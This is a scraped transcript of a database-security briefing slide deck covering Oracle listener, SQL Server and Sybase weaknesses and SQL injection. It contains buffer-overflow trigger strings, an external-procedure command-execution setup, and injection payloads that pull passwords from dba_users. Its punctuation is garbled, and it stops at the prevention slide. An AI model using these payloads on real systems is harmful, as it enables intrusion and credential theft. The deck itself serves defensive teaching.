Protecting Your Databases - PowerPoint PPT Presentation

1 / 43

About This Presentation

Title:

Protecting Your Databases

Description:

Recommend data be served through web app. Still vulnerable to application level attacks ... Database are extremely complex beasts ... – PowerPoint PPT presentation

Number of Views:61

Avg rating:3.0/5.0

Slides: 44

Provided by: aaronn5

Category:

more less

Transcript and Presenter's Notes

Title: Protecting Your Databases

1
Protecting Your Databases

Aaron Newman
anewman_at_appsecinc.com
Application Security, Inc.
www.appsecinc.com
Download updated version of presentation from
http//www.appsecinc.com/news/briefing.html

2
Agenda

Database threats
Oracle attacks
tnscmd demonstration
Microsoft SQL Server attacks
UDP buffer overflow demo
Sybase attacks
Generic attacks
SQL Injection Demo
Resources, Conclusion, and Wrap Up

3
Database Threats
4
External threats

Exposing a database to the Internet
DO NOT DO THIS!
Protocol stacks are riddled with overflows
ALL the database vendors!
Behind a firewall
Recommend data be served through web app
Still vulnerable to application level attacks
Still vulnerable to internal attacks
Careful of attacks using source port 53

5
Internal threats

Attacks from legitimate users
Users of a database gaining DBA privileges
Elevation of privileges
Using functions internal to the database
Equivalent of local attacks on Unix
Attacks from employees not granted access
Disgruntled or curious employees
Attacks from DBAs and sysadmins

6
Oracle Attacks
7
Listener vulnerabilities

What is the listener?
Proxy between the client and the database
Why is it important?
Separate authentication and auditing
Runs as a separate process
Accepts commands and performs tasks outside the
database
Vulnerabilities in Listener Service

8
Listener commands

What are the commands?
LSNRCTLgt helpThe following operations are
availablestart stop
statusquit exit
setshowpassword rawmode
displaymodetrc_file
trc_directory trc_levellog_file
log_directory log_statuscurrent_l
istener connect_timeout startup_waittimeuse_
plugandplay save_config_on_stop

9
Listener packet

Below is an example of a command

10
Security issues with the listener

The listener must be secured with password
Default configuration is no password
lsnrctl set password
Must set a strong password
Vulnerable to brute-forcing
Must protect the listener.ora file
Password stored in this file
Do not remotely manage listener
Password is not encrypted over network

11
Listener attack demo

http//www.jammed.com/jwa/hacks/security/tnscmd/

12
Buffer overflows in the listener service

Example of a connection string
(DESCRIPTION(CONNECT_DATA(CID(PROGRAM)(HOST)(
USER))(COMMANDstatus) (SERVICELIST80)
(VERSION135294976)))
Finding buffer overflows
Try changing this values to see what happens
Try USER with 4,000 Xs after it
Try SERVICE with 4000 Xs after it
Etc

13
Buffer overflows in the listener

Oracle 8.1.7
Sending 1 kilobyte of data for COMMAND caused
crash
Sending more than 4 kilobytes in the COMMAND
caused core dump
Problem in structured-exception handler allows
hacker to execute code
Oracle 9.0.1
Sending 1 kilobyte of data for SERVICE

14
More recent PL/SQL buffer overflows

Below are examples of PL/SQL overflows
TO_TIMESTAMP_TZ buffer overflow
SELECT TO_TIMESTAMP_TZ('1999-12-01 110000
-800', 'YYYY-MM-DD HHMISS TZHTZMXXXX230
additional Xs') FROM DUAL
TZ_OFFSET buffer overflow
SELECT TZ_OFFSET('US/EasternXXXX74 additional
Xs') FROM DUAL

15
More recent protocol buffer overflows

Username buffer overflow
C\oracle\bingt loadpsp -name -user XXX1150
characters/test_at_iasdb test
Authentication mechanism chokes on long username
This could be the Slammer Worm for Oracle
Actually much worse
Worm will not surface and servers will stay
unpatched

16
External Procedures

Functions in DLL and shared libraries
Can be called from PL/SQL
Setup by creating libraries and packages
CREATE LIBRARY test AS msvcrt.dllCREATE
PACKAGE test_function IS PROCEDURE exec(command
IN CHAR)CREATE PACKAGE BODY test_function IS
PROCEDURE exec(command IN CHAR)IS EXTERNAL NAME
system LIBRARY test

17
Remotely calling External Procedures

Not officially support
But it works
ExtProcs are another connection point for
listener
SID_LIST_LISTENER
(SID_LIST
(SID_DESC
(SID_NAME PLSExtProc)
(ORACLE_HOME E\oracle\ora81)
(PROGRAM extproc)
How does ExtProc authenticate the user
IT DOESNT!!!!!!!!!

18
Default setup - External Procedures

How do we fix this?
Removing any extprocs
From the listener.ora file
Setting up callout listener
Do not create ExtProc as another TCP/IP listener
endpoint
Create its own entry in the listener.ora file
using IPC protocol only
Can only be called local then

19
SQL Server Attacks
20
Worms

Voyager Alpha worm
Used blank sa passwords
Spida worm
Used blank sa passwords
Slammer worm
Used buffer overflow in UDP 1434 service

21
Buffer overflows

In extended stored procedures
Access C code from Transact SQL
Bad track record for buffer overflows
In DBCC commands
In other built-in command
pwdencrypt, RaiseError, FormatMessage
Most fixed in SP3
complete list _at_ http//www.appsecinc.com/asap/chec
ks
Client-side buffer overflow in SQL-DMO
Not yet patched

22
Local exploits

Passwords can be read by all users
DTS packages, replication, SQL agent
Elevating privileges
Global temp stored procedures
Cross-database chaining
SQL injection in sp_MSdropretry
Sandbox mode in Jet 3.51
Does not restrict use of shell command
Full presentation on local exploits
http//www.appsecinc.com/news/briefing.htmlhuntin
g

23
Patches

SQL Server 2000
Upgrade to Service Pack 3
Security hot fix for SP2 is not enough
SQL Server 7
Not all security fixes are patched
Database chaining issues
Other Local user security holes
Recommend upgrading to SQL Server 2000

24
UDP buffer overflow demo
25
Sybase Attacks
26
Buffer overflows in built-in functions

DBCC CHECKVERIFY
Version 12.5
DROP DATABASE
Version 12.5
1gt declare _at_test varchar(16384)
2gt select _at_test replicate('A', 16384)
3gt DROP DATABASE _at_test
4gt go
For additional details
http//www.appsecinc.com/resources/alerts/sybase

27
Extended stored procedures

Buffer overflow in xp_freedll
Memory corruption occurs with buffer of 451gt
xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX.dll'2gt GO
Version 12.0 and 12.5
Vulnerable on both UNIX and Windows

28
Generic Attacks
29
SQL Injection

Modify the query
Change
Select from my_table where column_x 1
To
Select from my_table where column_x 1 UNION
select password from DBA_USERS where qq

30
Example JSP page

Package myseverlets
lt.gt
String sql new String(SELECT FROM WebUsers
WHERE Username request.getParameter(username
) AND Password request.getParameter(pa
ssword)
stmt Conn.prepareStatement(sql)
Rs stmt.executeQuery()

31
Valid Input

If I set the username and password to
Username Bob
Password Hardtoguesspassword
The sql statement is
SELECT FROM WebUsers WHERE UsernameBob AND
PasswordHardtoguess

32
Hacker Input

Instead enter the password
Aa OR AA
The sql statement now becomes
SELECT FROM WebUsers WHERE UsernameBob AND
PasswordAa OR AA
The attacker is now in the database!

33
Selecting from other Tables

To select data other than the rows from the table
being selected from.
UNION the SQL Statement with the DBA_USERS view.

34
Sample ASP Page

Dim sql
Sql SELECT FROM PRODUCT WHERE ProductName
product_name
Set rs Conn.OpenRecordset(sql)
return the rows to the browser

35
Valid Input

Set the product_name to
DVD Player
The SQL Statement is now
SELECT FROM PRODUCT WHERE ProductNameDVD
Player

36
Hacker Input

Set the product_name to
test UNION select username, password from
dba_users where a a
The SQL Statement is now
SELECT FROM PRODUCT WHERE ProductNametest
UNION select username, password from dba_users
where aa

37
Preventing SQL Injection